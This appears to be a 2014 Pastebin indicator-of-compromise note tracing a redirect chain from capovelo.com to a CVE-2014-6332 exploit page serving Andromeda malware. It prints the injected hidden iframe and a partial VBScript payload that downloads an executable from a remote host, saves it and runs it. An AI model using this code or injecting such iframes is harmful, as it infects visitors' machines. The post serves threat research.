Advertisement
malwageddon

IOC - capovelo.com - 2014-12-18

Dec 18th, 2014
438
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // IOC - capovelo.com - 2014-12-18
  2.  
  3. // Visiting 'capovelo.com' might initiate a redirect chain that ends up on a website hosting CVE-2014-6332 exploit. Successful exploitation leads to downloading a variant of Andromeda malware - https://www.virustotal.com/en/file/6cc32beb7932f50e143033d7b50e4d278636510b6f186c863492296b6feb134a/analysis/
  4.  
  5.  
  6. // Redirect chain can be triggered by visiting - http://capovelo.com/community/page/index.html/_/articles/frontpage/thomas-weisel-responds-to-lance-armstrongs-r271
  7.  
  8. // The returned page contains the following <iframe>:
  9.  
  10. <iframe src="http://www.beyondrealitypack.com/Forums/uploads/monthly_12_2013/index.php?out=1418488864" width="1" height="1" frameborder="0"></iframe>
  11.  
  12. // When requested it returns 302 pointing at - http://fabesinternational.com/wp-content/plugins/wp_module/iee.php
  13.  
  14. // 'iee.php' contains exploit code for CVE-2014-6332. See partial example of the code:
  15.  
  16. <!doctype html>
  17. <html>
  18. <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8">
  19. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
  20.  
  21. <body>
  22.     <SCRIPT LANGUAGE="VBScript">
  23.         function runmumaa()
  24.         On Error Resume Next
  25.         Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP")
  26.         oXMLHTTP.Open "GET", "http://fabesinternational.com/wp-content/plugins/wp_module/calc.exe", 0
  27.         oXMLHTTP.Send
  28.         Set oADOStream = CreateObject("ADODB.Stream")
  29.         oADOStream.Mode = 3 '?????????? ?? ?????? ? ??????
  30.        oADOStream.Type = 1 '??? ?????? - Binary
  31.         oADOStream.Open
  32.         oADOStream.Write oXMLHTTP.responseBody
  33.         oADOStream.SaveToFile "cal.exe", 2
  34.         set shell = createobject("Shell.Application")
  35.         shell.ShellExecute "cal.exe"
  36.         end
  37.         function
  38.     </script>
  39.  
  40.     <SCRIPT LANGUAGE="VBScript">
  41.         dim aa()
  42.         dim ab()
  43.         dim a0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement